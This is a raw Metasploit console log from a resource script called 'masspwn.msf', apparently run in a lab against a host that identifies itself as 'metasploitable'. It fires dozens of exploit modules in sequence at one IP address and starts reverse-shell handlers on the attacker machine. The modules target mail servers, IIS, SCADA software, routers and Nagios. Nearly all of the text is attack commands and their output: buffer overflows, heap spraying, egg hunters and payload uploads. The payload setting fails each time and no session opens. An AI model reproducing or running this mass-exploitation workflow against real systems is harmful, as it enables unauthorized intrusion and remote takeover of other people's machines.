[!] ******************************************************************************************
[!] *                 The module unix/polycom_hdx_auth_bypass is deprecated!                 *
[!] *                       It will be removed on or about 2018-11-04                        *
[!] *                 Use exploit/unix/misc/polycom_hdx_auth_bypass instead                  *
[!] ******************************************************************************************
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2037
LPORT => 2037
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[-] 192.168.1.245:23 - Exploit aborted due to failure: unknown: 192.168.1.245:23 - Failed to connect to target service
[!] 192.168.1.245:23 - ******************************************************************************************
[!] 192.168.1.245:23 - *                 The module unix/polycom_hdx_auth_bypass is deprecated!                 *
[!] 192.168.1.245:23 - *                       It will be removed on or about 2018-11-04                        *
[!] 192.168.1.245:23 - *                 Use exploit/unix/misc/polycom_hdx_auth_bypass instead                  *
[!] 192.168.1.245:23 - ******************************************************************************************
[*] Exploit running as background job 34.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/telnet/netgear_telnetenable
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] Started reverse double SSL handler on 192.168.1.207:2037
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
[*] 192.168.1.245:23 - Starting Authentication bypass with 6 threads with 100 max connections
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2038
LPORT => 2038
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 35.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/lotus/domino_icalendar_organizer
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2039
LPORT => 2039
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:23 - Sending 20000 byte username as exploit (including 403 byte payload)...
[*] 192.168.1.245:23 - Exploit sent...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 36.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/smtp/mercury_cram_md5
[*] Started reverse TCP handler on 192.168.1.207:2039
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2040
LPORT => 2040
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[+] 192.168.1.245:23 - Detected telnetd on TCP
[*] 192.168.1.245:23 - Connecting to telnetd
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 37.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/smtp/wmailserver
[*] Started reverse TCP handler on 192.168.1.207:2040
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2041
LPORT => 2041
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[-] 192.168.1.245:25 - Exploit failed: ActiveRecord::ConnectionTimeoutError could not obtain a database connection within 5.000 seconds (waited 5.013 seconds)
[*] Exploit running as background job 38.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/smtp/ms03_046_exchange2000_xexch50
[*] Started reverse TCP handler on 192.168.1.207:2041
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2042
LPORT => 2042
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 39.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/smtp/mailcarrier_smtp_ehlo
[*] Started reverse TCP handler on 192.168.1.207:2042
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2043
LPORT => 2043
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:25 - Trying target Mercury Mail Transport System 4.51...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:25 - Trying target Windows 2000 Pro English All...
[*] Exploit running as background job 40.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/smtp/njstar_smtp_bof
[*] Started reverse TCP handler on 192.168.1.207:2043
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2044
LPORT => 2044
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:25 - Trying to exploit Exchange 2000 with address 0x0c900c90...
[*] 192.168.1.245:25 - Exploit attempt #1
[*] Exploit running as background job 41.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/unix/smtp/morris_sendmail_debug
[*] Started reverse TCP handler on 192.168.1.207:2044
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2045
LPORT => 2045
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:25 - Connected to SMTP server: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)

[*] 192.168.1.245:25 - Target does not appear to be running Exchange.
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 42.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/smtp/exim_gethostbyname_bof
[*] Started reverse TCP double handler on 192.168.1.207:2045
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2046
LPORT => 2046
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[-] 192.168.1.245:25 - Exploit failed: The following options failed to validate: SENDER_HOST_ADDRESS.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/iis/ms01_033_idq
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2047
LPORT => 2047
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:25 - Trying target Windows XP SP2/SP3...
[*] 192.168.1.245:25 - Sending the egg...
[*] 192.168.1.245:25 - Sending our buffer containing the egg hunter...
[*] 192.168.1.245:25 - 502 5.5.2 Error: command not recognized

[*] 192.168.1.245:25 - Target is not vulnerable.
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 43.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/iis/ms02_018_htr
[*] Started reverse TCP handler on 192.168.1.207:2047
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2048
LPORT => 2048
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] 192.168.1.245:25 - Exploit failed: ActiveRecord::ConnectionTimeoutError could not obtain a database connection within 5.000 seconds (waited 5.000 seconds)
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] 192.168.1.245:80 - Trying target Windows 2000 Pro English SP0...
[*] Exploit running as background job 44.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/iis/ms01_023_printer
[*] Started reverse TCP handler on 192.168.1.207:2048
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2049
LPORT => 2049
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:80 - Trying target Windows NT 4.0 SP3 with jmp eax at 0x77f81a4d...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 45.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/iis/ms01_026_dbldecode
[-] Handler failed to bind to 192.168.1.207:2049:-  -
[-] Handler failed to bind to 0.0.0.0:2049:-  -
[-] 192.168.1.245:80 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:2049).
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2050
LPORT => 2050
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 46.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/misc/gh0st
[*] Started reverse TCP handler on 192.168.1.207:2050
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:80 - Executing command: dir (options: {:windir=>"winnt"})
[*] 192.168.1.245:80 - Executing command: dir (options: {:windir=>"windows"})
[-] 192.168.1.245:80 - Exploit aborted due to failure: no-target: Unable to detect the target host windows directory (maybe not vulnerable)!
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2051
LPORT => 2051
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 47.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/proxy/qbik_wingate_wwwproxy
[*] Started reverse TCP handler on 192.168.1.207:2051
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:80 - Trying target Gh0st Beta 3.6
[*] 192.168.1.245:80 - Spraying heap...
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2052
LPORT => 2052
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:80 - Bad magic: <html
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 48.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/proxy/bluecoat_winproxy_host
[*] Started reverse TCP handler on 192.168.1.207:2052
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
[*] 192.168.1.245:80 - Trying target WinGate 6.1.1.1077...
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2053
LPORT => 2053
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 49.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/scada/advantech_webaccess_dashboard_file_upload
[*] Started reverse TCP handler on 192.168.1.207:2053
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
[*] 192.168.1.245:80 - Trying target WinProxy <= 6.1 R1a Universal...
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2054
LPORT => 2054
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 50.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/scada/ge_proficy_cimplicity_gefebt
[*] Started reverse TCP handler on 192.168.1.207:2054
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:80 - Target is not vulnerable.
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2055
LPORT => 2055
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 51.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/http/xitami_if_mod_since
resource (masspwn.msf)> set RHOST 192.168.1.245
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:2055
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2056
LPORT => 2056
resource (masspwn.msf)> set ExitOnSession false
[*] BCLs available at \\192.168.1.207\yFM\prZ{i}.bcl
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:80).
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 52.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/http/amlibweb_webquerydll_app
[*] Started reverse TCP handler on 192.168.1.207:2056
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:80 - Waiting for payload to execute...
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2057
LPORT => 2057
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 53.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/http/navicopa_get_overflow
[*] Started reverse TCP handler on 192.168.1.207:2057
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2058
LPORT => 2058
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 54.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/http/sambar6_search_results
[*] Started reverse TCP handler on 192.168.1.207:2058
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2059
LPORT => 2059
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 55.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/http/disk_pulse_enterprise_get
[*] Started reverse TCP handler on 192.168.1.207:2059
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
[*] 192.168.1.245:80 - Trying target NaviCOPA 2.0.1 Universal
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2060
LPORT => 2060
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 56.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/http/apache_modjk_overflow
[*] Started reverse TCP handler on 192.168.1.207:2060
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
[*] 192.168.1.245:80 - Sending 14419 bytes to remote host.
[*] 192.168.1.245:80 - Got Response!
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2061
LPORT => 2061
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 57.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/http/shttpd_post
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:2061
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] Generating exploit...
[*] Sending exploit...
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2062
LPORT => 2062
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 58.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/http/sysax_create_folder
[*] Started reverse TCP handler on 192.168.1.207:2062
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
[*] 192.168.1.245:80 - Trying target mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)...
[-] 192.168.1.245:80 - The exploit failed : HTTP Status Code '403 Forbidden' received :-(
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2063
LPORT => 2063
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[-] Exploit failed: The following options failed to validate: SysaxUSER, SysaxPASS.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/http/disk_pulse_enterprise_bof
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] 192.168.1.245:80 - Trying target address 0x776a183a...
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2064
LPORT => 2064
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 59.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/http/dup_scout_enterprise_login_bof
resource (masspwn.msf)> set RHOST 192.168.1.245
[*] Started reverse TCP handler on 192.168.1.207:2064
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
[*] Generating exploit...
[*] Total exploit size: 21383
[*] Triggering the exploit now...
[*] Please be patient, the egghunter may take a while...
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2065
LPORT => 2065
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 60.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/http/hp_nnm_openview5
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2066
LPORT => 2066
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 61.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/http/bea_weblogic_jsessionid
[*] Started reverse TCP handler on 192.168.1.207:2066
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2067
LPORT => 2067
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Started reverse TCP handler on 192.168.1.207:2065
[*] Exploit running as background job 62.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/windows/http/servu_session_cookie
[*] Started reverse TCP handler on 192.168.1.207:2067
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2068
LPORT => 2068
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:80 - Trying target HP OpenView Network Node Manager 7.50 / Windows 2000 All...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 63.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/unix/http/epmp1000_ping_cmd_shell
[*] Started reverse TCP handler on 192.168.1.207:2068
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2069
LPORT => 2069
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] Generating exploit...
[*] Triggering the exploit now...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 64.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/unix/http/xdebug_unauth_exec
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2070
LPORT => 2070
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] 192.168.1.245:80 - Exploit failed: ActiveRecord::ConnectionTimeoutError could not obtain a database connection within 5.000 seconds (waited 5.000 seconds)
[*] Started reverse TCP handler on 192.168.1.207:2069
[*] 192.168.1.245:80 - Trying target Windows 2000 SP4 and XP SP3 English (SEH)...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 65.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/unix/http/contentkeeperweb_mimencode
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2071
LPORT => 2071
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 66.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/unix/http/epmp1000_get_chart_cmd_shell
[*] Started reverse TCP double handler on 192.168.1.207:2071
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2072
LPORT => 2072
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] Started reverse TCP handler on 192.168.1.207:2070
[-] 192.168.1.245:80 - Application does not appear to be Cambium ePMP 1000. The target is not vulnerable.
[-] Exploit failed: NoMethodError undefined method `<' for nil:NilClass
[*] 192.168.1.245:80 - Uploading payload to target...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 67.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/http/nagios_xi_chained_rce_2_electric_boogaloo
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2073
LPORT => 2073
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 68.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/http/trueonline_billion_5200w_rce
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2074
LPORT => 2074
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] 192.168.1.245:80 - Calling payload...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 69.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/http/netgear_wnr2000_rce
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2075
LPORT => 2075
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] 192.168.1.245:80 - Exploit failed: ActiveRecord::ConnectionTimeoutError could not obtain a database connection within 5.000 seconds (waited 5.048 seconds)
[*] Started reverse TCP handler on 192.168.1.207:2072
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Exploit running as background job 70.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/http/crypttech_cryptolog_login_exec
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2076
LPORT => 2076
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
[*] Started reverse TCP handler on 192.168.1.207:2073
[*] Exploit running as background job 71.
[*] Exploit completed, but no session was created.
resource (masspwn.msf)> use exploits/linux/http/mutiny_frontend_upload
resource (masspwn.msf)> set RHOST 192.168.1.245
RHOST => 192.168.1.245
resource (masspwn.msf)> set LHOST 192.168.1.207
LHOST => 192.168.1.207
resource (masspwn.msf)> set LPORT 2077
LPORT => 2077
resource (masspwn.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.msf)> set PAYLOAD generic_shell_reverse
[*] Started reverse TCP handler on 192.168.1.207:2076
[-] 192.168.1.245:80 - Application does not appear to be Cambium ePMP 1000. The target is not vulnerable.
[-] Exploit failed: NoMethodError undefined method `<' for nil:NilClass
[-] Exploit failed: NoMethodError undefined method `text' for nil:NilClass
[*] 192.168.1.245:80 - Attempting to exploit unauthenticated injection
[-] 192.168.1.245:80 - Well that failed, trying the authenticated one...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.msf)> exploit -j -z
